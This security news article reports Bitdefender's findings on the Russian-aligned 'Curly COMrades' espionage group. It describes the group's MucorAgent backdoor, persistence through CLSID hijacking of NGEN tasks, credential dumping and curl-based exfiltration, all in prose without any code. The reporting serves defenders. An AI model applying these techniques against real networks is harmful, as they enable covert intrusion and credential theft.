“Curly COMrades” Group Unmasked: Russian Threat Actors Deploy New Backdoor in Geopolitical Espionage Campaign

Bitdefender Labs has uncovered a new cyber-espionage group, dubbed “Curly COMrades”, believed to operate in support of Russian geopolitical interests. Active since mid-2024, the group has been conducting targeted intrusions against judicial and government bodies in Georgia, as well as an energy distribution company in Moldova.

According to the researchers, “The group’s primary objective is to maintain long-term access to target networks and steal valid credentials.” These credentials enable lateral movement, data collection, and exfiltration—often through repeated attempts to extract the NTDS database and dump LSASS memory from compromised systems.

At the core of Curly COMrades’ toolkit is a newly discovered backdoor named MucorAgent, which leverages an innovative persistence method: hijacking CLSID entries to target NGEN (Native Image Generator) scheduled tasks.

Bitdefender explains that NGEN tasks are usually disabled, but “the operating system occasionally enables and executes [them] at unpredictable intervals… making it a great mechanism for restoring access covertly.” The malware’s three-stage architecture enables it to execute AES-encrypted PowerShell scripts without spawning a powershell.exe process, exfiltrating results disguised as PNG image files via curl.exe.

The group maintains multiple redundant access points using Resocks, SOCKS5, SSH, and Stunnel, often deploying proxy tools from GitHub with obfuscated Go binaries compiled via garble. These tools are designed to blend in with legitimate system processes and maintain persistence through scheduled tasks and Windows services.

In one case, Curly COMrades used a compromised Redmine server in Ukraine as a relay point, likely to evade geographic restrictions and blend malicious traffic with normal business operations. “By routing C2 and data exfiltration through seemingly harmless sites, they bypass defenses that trust known domains and hide their true infrastructure,” the report notes.

Credential harvesting remains a key focus, with the group employing tools like Mimikatz, TrickDump, and custom LSASS dumpers—some using the same AES key patterns as MucorAgent. Techniques include DCSync attacks, NTDS extraction via Volume Shadow Copy, and theft of browser-stored credentials from Chrome and Firefox.

Their approach is methodical: “Sometimes, their approach appeared to rely on attempting multiple techniques until successful access was achieved.”

Exfiltration is deliberately rare and often manual, minimizing detection risk. Data—including credentials, domain controller scripts, and internal application archives—is staged in C:\Users\Public\Documents before being archived with WinRAR and uploaded to attacker-controlled or compromised servers using curl.exe.

Bitdefender’s findings serve as a reminder that well-resourced threat actors can combine ordinary utilities with creative persistence to evade security measures for extended periods—a threat that critical infrastructure operators must take seriously.

Related Posts:

• Massive Ad Fraud Campaign Deployed 331 Apps, Resulting in 60 Million Downloads
• Lazarus Group Lures Victims with Fake LinkedIn Job Offers, Warns Bitdefender
• Bitdefender GravityZone Console Hit by Critical PHP Deserialization Vulnerability